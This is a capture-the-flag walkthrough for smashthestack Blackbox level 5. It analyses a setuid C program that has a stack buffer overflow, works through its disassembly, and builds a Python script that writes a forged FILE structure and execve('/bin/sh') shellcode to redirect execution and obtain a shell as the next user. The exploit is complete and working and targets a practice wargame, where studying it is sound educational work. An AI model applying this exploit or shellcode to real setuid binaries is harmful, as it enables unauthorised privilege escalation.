Blackbox
Level 5
As in the previous posts, the password for the next level has been replaced with question marks so as to not make this too obvious, and so that the point of the walkthrough, which is mainly educational, will not be missed.
Also, make sure you notice this SPOILER ALERT! If you want to try and solve the level by yourself then read no further!
Hello again. Make sure you are comfortable, because this is going to be a somewhat long level, and rather more difficult that what we saw so far.
First order of business, login
& ls
:
$ ssh -p 2225 level5@blackbox.smashthestack.org
level5@blackbox.smashthestack.org's password:
...
level5@blackbox:~$ ls -l
total 560
-rwsr-xr-x 1 level6 level6 557846 2008-01-12 21:17 list
-rw-r--r-- 1 root level5 475 2007-12-29 14:10 list.c
-rw-r--r-- 1 root level5 10 2007-12-29 14:10 password
And now we take a look at the source file:
#include <stdio.h>
int main(int argc, char **argv)
{
char buf[100];
size_t len;
char fixedbuf[10240];
FILE *fh;
char *ptr = fixedbuf;
int i;
fh = fopen("somefile", "r");
if(!fh)
return 0;
while((len = fread(buf, 1, 100, fh)) > 0) {
for(i = 0; i < len; i++) {
// Disable output modifiers
switch(buf[i]) {
case 0xFF:
case 0x00:
case 0x01:
break;
default:
*ptr = buf[i];
ptr++;
}
}
}
printf("%s", fixedbuf);
fclose(fh);
}
The program seems to open some fixed file from the current path (which means that we will have to generate that "somefile"
file under /tmp
), it then proceeds to read chunks of 100 bytes from the file into some temporary buffer, which are copied to a bigger buffer while filtering-out specific byte values.
The contents of the big buffer are then printed out to us.
Well, our attack surface is obviously the file filename
. We can also notice that if filename
is indeed longer than 10240 bytes, the read-chunk-and-copy loop will happily continue its business, whereby it will probably mess up the stack.
So lets try and see what the stack frame looks like. And the way to do that is to look at the diassembly of main
:
level5@blackbox:~$ objdump -d list|grep -A65 "<main>:"
08048208 <main>:
8048208: 8d 4c 24 04 lea 0x4(%esp),%ecx
804820c: 83 e4 f0 and $0xfffffff0,%esp
804820f: ff 71 fc pushl 0xfffffffc(%ecx)
8048212: 55 push %ebp
8048213: 89 e5 mov %esp,%ebp
8048215: 51 push %ecx
8048216: 81 ec 94 28 00 00 sub $0x2894,%esp
804821c: 8d 85 88 d7 ff ff lea 0xffffd788(%ebp),%eax
8048222: 89 45 f4 mov %eax,0xfffffff4(%ebp)
8048225: c7 44 24 04 88 32 0a movl $0x80a3288,0x4(%esp)
804822c: 08
804822d: c7 04 24 8a 32 0a 08 movl $0x80a328a,(%esp)
8048234: e8 57 af 00 00 call 8053190 <_IO_new_fopen>
8048239: 89 45 f0 mov %eax,0xfffffff0(%ebp)
804823c: 83 7d f0 00 cmpl $0x0,0xfffffff0(%ebp)
8048240: 75 43 jne 8048285 <main+0x7d>
8048242: c7 85 78 d7 ff ff 00 movl $0x0,0xffffd778(%ebp)
8048249: 00 00 00
804824c: e9 8f 00 00 00 jmp 80482e0 <main+0xd8>
8048251: c7 45 f8 00 00 00 00 movl $0x0,0xfffffff8(%ebp)
8048258: eb 23 jmp 804827d <main+0x75>
804825a: 8b 45 f8 mov 0xfffffff8(%ebp),%eax
804825d: 0f b6 44 05 88 movzbl 0xffffff88(%ebp,%eax,1),%eax
8048262: fe c0 inc %al
8048264: 3c 02 cmp $0x2,%al
8048266: 77 02 ja 804826a <main+0x62>
8048268: eb 10 jmp 804827a <main+0x72>
804826a: 8b 45 f8 mov 0xfffffff8(%ebp),%eax
804826d: 0f b6 54 05 88 movzbl 0xffffff88(%ebp,%eax,1),%edx
8048272: 8b 45 f4 mov 0xfffffff4(%ebp),%eax
8048275: 88 10 mov %dl,(%eax)
8048277: ff 45 f4 incl 0xfffffff4(%ebp)
804827a: ff 45 f8 incl 0xfffffff8(%ebp)
804827d: 8b 45 f8 mov 0xfffffff8(%ebp),%eax
8048280: 3b 45 ec cmp 0xffffffec(%ebp),%eax
8048283: 72 d5 jb 804825a <main+0x52>
8048285: 8b 45 f0 mov 0xfffffff0(%ebp),%eax
8048288: 89 44 24 0c mov %eax,0xc(%esp)
804828c: c7 44 24 08 64 00 00 movl $0x64,0x8(%esp)
8048293: 00
8048294: c7 44 24 04 01 00 00 movl $0x1,0x4(%esp)
804829b: 00
804829c: 8d 45 88 lea 0xffffff88(%ebp),%eax
804829f: 89 04 24 mov %eax,(%esp)
80482a2: e8 09 b0 00 00 call 80532b0 <_IO_fread>
80482a7: 89 45 ec mov %eax,0xffffffec(%ebp)
80482aa: 83 7d ec 00 cmpl $0x0,0xffffffec(%ebp)
80482ae: 0f 95 c0 setne %al
80482b1: 84 c0 test %al,%al
80482b3: 75 9c jne 8048251 <main+0x49>
80482b5: 8d 85 88 d7 ff ff lea 0xffffd788(%ebp),%eax
80482bb: 89 44 24 04 mov %eax,0x4(%esp)
80482bf: c7 04 24 93 32 0a 08 movl $0x80a3293,(%esp)
80482c6: e8 e5 ab 00 00 call 8052eb0 <_IO_printf>
80482cb: 8b 45 f0 mov 0xfffffff0(%ebp),%eax
80482ce: 89 04 24 mov %eax,(%esp)
80482d1: e8 0a ac 00 00 call 8052ee0 <_IO_new_fclose>
80482d6: c7 85 78 d7 ff ff 00 movl $0x0,0xffffd778(%ebp)
80482dd: 00 00 00
80482e0: 8b 85 78 d7 ff ff mov 0xffffd778(%ebp),%eax
80482e6: 81 c4 94 28 00 00 add $0x2894,%esp
80482ec: 59 pop %ecx
80482ed: 5d pop %ebp
80482ee: 8d 61 fc lea 0xfffffffc(%ecx),%esp
80482f1: c3 ret
Wow, good thing the executable has symbol information, because the way to identify the position of the local variables in the stack is by tracking library function calls.
Lets start with these two lines though:
804821c: 8d 85 88 d7 ff ff lea 0xffffd788(%ebp),%eax
8048222: 89 45 f4 mov %eax,0xfffffff4(%ebp)
This looks like an address assignment, we have such a line in the C program:
char *ptr = fixedbuf;
This means that fixedbuf
starts at ebp-0x2878
, and ptr
is stored at ebp-0xc
.
Next we have a call to _IO_new_fopen
:
8048225: c7 44 24 04 88 32 0a movl $0x80a3288,0x4(%esp)
804822c: 08
804822d: c7 04 24 8a 32 0a 08 movl $0x80a328a,(%esp)
8048234: e8 57 af 00 00 call 8053190 <_IO_new_fopen>
8048239: 89 45 f0 mov %eax,0xfffffff0(%ebp)
And the output, which is a file pointer, is stored at ebp-0x10
, which must be our fp
.
Now let’s look at the call to _IO_fread
:
8048285: 8b 45 f0 mov 0xfffffff0(%ebp),%eax
8048288: 89 44 24 0c mov %eax,0xc(%esp)
804828c: c7 44 24 08 64 00 00 movl $0x64,0x8(%esp)
8048293: 00
8048294: c7 44 24 04 01 00 00 movl $0x1,0x4(%esp)
804829b: 00
804829c: 8d 45 88 lea 0xffffff88(%ebp),%eax
804829f: 89 04 24 mov %eax,(%esp)
80482a2: e8 09 b0 00 00 call 80532b0 <_IO_fread>
80482a7: 89 45 ec mov %eax,0xffffffec(%ebp)
The first parameter is at the bottom of the stack (at esp
), this should be the address of buf
, and we can see it is ebp-0x78
.
The rest of the parameters are already known to us so I won’t stall on them.
What’s left in this function call is the return value, which is stored at ebp-0x14
and is our len
.
The last local variable is i
, we can recognize it as the address that gets loaded with a 0, as we can see in the for loop initialization.
There are actually two such instances. This is the first one:
8048242: c7 85 78 d7 ff ff 00 movl $0x0,0xffffd778(%ebp)
Which is the return value of main
, as we can see eax
is reloaded from that address right before exiting main
:
80482e0: 8b 85 78 d7 ff ff mov 0xffffd778(%ebp),%eax
80482e6: 81 c4 94 28 00 00 add $0x2894,%esp
80482ec: 59 pop %ecx
80482ed: 5d pop %ebp
80482ee: 8d 61 fc lea 0xfffffffc(%ecx),%esp
80482f1: c3 ret
The second one is the one that interests us:
8048251: c7 45 f8 00 00 00 00 movl $0x0,0xfffffff8(%ebp)
Which means i
is stored at ebp-0x8
.
Let’s summarize it all up in one diagram:
Imagine now the following scenario: We have a very big file, and the read-chunk-and-copy loop keeps copying the data from buf
into fixedbuf
. After 102 of these cycles, ptr
is pointing to fixedbuf+10200
, or, buf-40
. After the next cycle, ptr
will point to buf+60
. This means, that on the next read
(104’th if my tally has been kept correctly) ptr
will end up pointing beyond the stack frame.
Not entirely though. The thing is, that the copying is not done in one atomic operation, rather, buf
is copied to ptr
byte-by-byte, which means that 40 bytes into the 104’th cycle, the value of len
will change. This affects the flow control of the for-loop, because if we make len
smaller than i
is in that round, the loop will stop.
Since x86 is a little-endian machine, the first byte of len
that will be overwritten is the LSB, so we need to overwrite it so that the loop continues, anything larger than 101 will do.
Now, remember that not all byte values are allowed, and if we want to reach interesting places in the stack, we are forced to write the rest of len
. This means that the smallest value we can write is 0x02
, and this will make len
look something like 0x020202??
when we are done with it.
Next we override fp
, again, we can’t help but to overwrite it. Let’s leave the discussion about it for later though.
After that comes ptr
, and this is where it gets tricky, we are overwriting the pointer, using itself as a pointer to its individual bytes. whichever way it goes, once we overwrite the LSB, the pointer will not point to itself anymore, so we need to decide were we want it to point. Well, how about skipping over the rest of ptr
, and continue at the MSB of i
.
Why would we want to do that? well, remember we put something like 0x020202??
in len
? then if we set the MSB of i
to 0x03
, then i
will look like 0x03??????
which is bigger than len
! so after that the loop will stop.
Why do we want it to stop now? Well, you see, when the loop on i
stops, there will be another call to fread
, only now, fp
is different.
What would happen? Well, let’s take a look at that _IO_fread
(cropped in favor of readability):
080532b0 <_IO_fread>:
80532b0: 55 push %ebp
80532b1: 89 e5 mov %esp,%ebp
80532b3: 83 ec 2c sub $0x2c,%esp
80532b6: 89 75 f8 mov %esi,0xfffffff8(%ebp)
80532b9: 8b 75 0c mov 0xc(%ebp),%esi
80532bc: 89 7d fc mov %edi,0xfffffffc(%ebp)
80532bf: 8b 7d 10 mov 0x10(%ebp),%edi
80532c2: 89 5d f4 mov %ebx,0xfffffff4(%ebp)
80532c5: 0f af f7 imul %edi,%esi
80532c8: 85 f6 test %esi,%esi
80532ca: 0f 84 a4 00 00 00 je 8053374 <_IO_fread+0xc4>
80532d0: 8b 55 14 mov 0x14(%ebp),%edx
80532d3: c7 45 e0 00 00 00 00 movl $0x0,0xffffffe0(%ebp)
80532da: 8b 02 mov (%edx),%eax
80532dc: 25 00 80 00 00 and $0x8000,%eax
80532e1: 66 85 c0 test %ax,%ax
80532e4: 75 1f jne 8053305 <_IO_fread+0x55>
80532e6: b8 00 00 00 00 mov $0x0,%eax
80532eb: 85 c0 test %eax,%eax
80532ed: c7 45 e0 00 00 00 00 movl $0x0,0xffffffe0(%ebp)
80532f4: 0f 85 7e 00 00 00 jne 8053378 <_IO_fread+0xc8>
80532fa: 8b 45 14 mov 0x14(%ebp),%eax
80532fd: 89 04 24 mov %eax,(%esp)
8053300: e8 bb 40 02 00 call 80773c0 <_IO_flockfile>
8053305: 8b 55 14 mov 0x14(%ebp),%edx
8053308: 8b 45 08 mov 0x8(%ebp),%eax
805330b: 89 74 24 08 mov %esi,0x8(%esp)
805330f: 89 14 24 mov %edx,(%esp)
8053312: 89 44 24 04 mov %eax,0x4(%esp)
8053316: e8 b5 38 00 00 call 8056bd0 <_IO_sgetn>
805331b: 8b 55 14 mov 0x14(%ebp),%edx
805331e: 89 c3 mov %eax,%ebx
8053320: 8b 02 mov (%edx),%eax
8053322: 25 00 80 00 00 and $0x8000,%eax
8053327: 66 85 c0 test %ax,%ax
805332a: 74 37 je 8053363 <_IO_fread+0xb3>
...
First, let’s remember what are the parameters to _IO_fread
, in what order are they in the stack, and where can we see them in the disassembly.
Well, the parameters were (at the bottom) buf
, then the chunk length
(=1), then the number of chunks (100) and finally fp
.
This means that inside _IO_fread
, we can find fp
at ebp+0x14
. Let’s see what does the function do with it:
80532d0: 8b 55 14 mov 0x14(%ebp),%edx
80532d3: c7 45 e0 00 00 00 00 movl $0x0,0xffffffe0(%ebp)
80532da: 8b 02 mov (%edx),%eax
80532dc: 25 00 80 00 00 and $0x8000,%eax
80532e1: 66 85 c0 test %ax,%ax
80532e4: 75 1f jne 8053305 <_IO_fread+0x55>
The long-word to which fp
points is copied into eax
, after which it is masked with 0x8000
, and if that bit is set, it jumps to 0x08053305
:
8053305: 8b 55 14 mov 0x14(%ebp),%edx
8053308: 8b 45 08 mov 0x8(%ebp),%eax
805330b: 89 74 24 08 mov %esi,0x8(%esp)
805330f: 89 14 24 mov %edx,(%esp)
8053312: 89 44 24 04 mov %eax,0x4(%esp)
8053316: e8 b5 38 00 00 call 8056bd0 <_IO_sgetn>
This is a call to _IO_sgetn
with fp
as the first parameter.
Fine, let’s see what _IO_sgetn
does:
08056bd0 <_IO_sgetn>:
8056bd0: 55 push %ebp
8056bd1: 89 e5 mov %esp,%ebp
8056bd3: 8b 55 08 mov 0x8(%ebp),%edx
8056bd6: 5d pop %ebp
8056bd7: 8b 8a 94 00 00 00 mov 0x94(%edx),%ecx
8056bdd: 8b 49 20 mov 0x20(%ecx),%ecx
8056be0: ff e1 jmp *%ecx
8056be2: 8d b4 26 00 00 00 00 lea 0x0(%esi),%esi
8056be9: 8d bc 27 00 00 00 00 lea 0x0(%edi),%edi
In the context of _IO_sgetn
, fp
is located at ebp+0x8
.
Well, there’s some pointer magic that’s happening here, after which there a jump to a location stored in ecx
.
let’s try to write it a more readable C notation:
edx = fp;
ecx = *(unsigned long *)(edx + 0x94);
ecx = *(unsigned long *)(ecx + 0x20);
It looks like fp
actually points to some structure, which contains pointers to other structures, which contain an address of a handler.
Well, if we can make the program jump to our handler, we can make it execute a shell.
OK then, let’s look back and review what we know, and decide on a strategy.
First, we have found a way to override fp
, and then stop the loop and make fread
run again.
Then we saw that in fread
, some address is extracted from fp
, and then the program jumps to that address.
I propose then the following strategy:
. We override fp
with the address of the bottom of fixedbuf
.
. We prepare the first long word at the bottom of fixedbuf
to be something like 0x????80??
, so as to steer the execution path in our direction.
. 0x94
bytes after the beginning of fixedbuf
, we prepare a pointer to another place in fixedbuf
. let’s call it ptr1
.
. 0x20
bytes after ptr1
, we will prepare another address which will be the address of our shellcode.
It should be much easier to understand this in a diagram:
This is the structure we need to have in the beginning of our file.
Assuming we know ebp
, the end of the file (meaning, starting from the point in which we overwrite len
) should look like this:
. First 0x70
, just to make sure we keep the for-loop alive.
. Then 0x020202
because we have to
. Then we overwrite fp
with fixedbuf=ebp-0x2878
. Then we overwrite the LSB of ptr
with the address of the second to MSB of i
. That is because after we overwrite the LSB of ptr
, it will get incremented in the next line of code, this would make ptr
point to the LSB of i
.
. And then we overwrite the MSB of i
with 0x03
which will cause the loop to stop, and let the bottom of the file do its magic.
. Between the beginning and the end, we need to fill the space with something.
The only open question left is - what is ebp
?
Let’s take a look:
level5@blackbox:~$ gdb list
...
(gdb) break main
Breakpoint 1 at 0x8048216
(gdb) run
Starting program: /home/level5/list
Breakpoint 1, 0x08048216 in main ()
(gdb) p $ebp
$1 = (void *) 0xbfffd8f8
Well, this means that we need to override fp
with ebp-0x2878=0xbfffb080
.
This is not good, because in 0xbfffb0a0
we have 0xff
which we can not write.
This pretty much closes the lid on everything we were planning so far, because the basic premise of the entire strategy is that we can redirect fp
to our own file structure.
However, we should not abandon all hope, because we have the power to make the stack begin much lower by simply feeding some very long argument to the program. Let’s see how this works:
(gdb) run `python -c "print 'a'*0x100"`
Starting program: /home/level5/list `python -c "print 'a'*0x100"`
Breakpoint 1, 0x08048216 in main ()
(gdb) p $ebp
$1 = (void *) 0xbfffd7f8
This address is lower by 0x100
bytes than ebp
when running without parameters. Let’s try again now with an even larger number:
(gdb) run `python -c "print 'a'*0x10000"`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/level5/list `python -c "print 'a'*0x10000"`
Breakpoint 1, 0x08048216 in main ()
(gdb) p $ebp
$2 = (void *) 0xbffed8f8
Bingo! that is our ebp
for reasons I’ll go into in a pending article. Suffice to say that when running list inside gdb we have argv[0]=/home/level5/list
(as I highlighted above) , and when running from /tmp
we have argv[0]=/home/level5/list
, which are the same.
Well, now that we have all our constants and strategies settled down, we can generate the input file. I like using scripts:
import struct
EBP = 0xbffed8f8
FIXEDBUF = EBP - 0x2878
I = EBP - 0x8
PTR1 = FIXEDBUF + 0x98
PTR2 = FIXEDBUF + 0xbc
SHELLCODE = "31c050682f2f7368682f62696e89e3505389e131d2b00bcd80".decode("hex")
FILE = ""
FILE += struct.pack("<L", 0x08080808)
FILE += '\x90' * 0x90
FILE += struct.pack("<L", PTR1)
FILE += '\x90' * 0x20
FILE += struct.pack("<L", PTR2)
FILE += SHELLCODE
FILE += '\x90' * (10340 - len(FILE))
FILE += struct.pack("<L", 0x02020270)
FILE += struct.pack("<L", FIXEDBUF)
FILE += struct.pack("<L", I + 2)[0]
FILE += '\x03'
f = open('somefile', 'wb')
f.write(FILE)
f.close()
Let’s give it a shot:
level5@blackbox:/tmp$ python genfile.py
level5@blackbox:/tmp$ ~/list `python -c "print 'a'*0x10000"`
sh-3.1$ cat /home/level6/password
???????????????
And we’re done!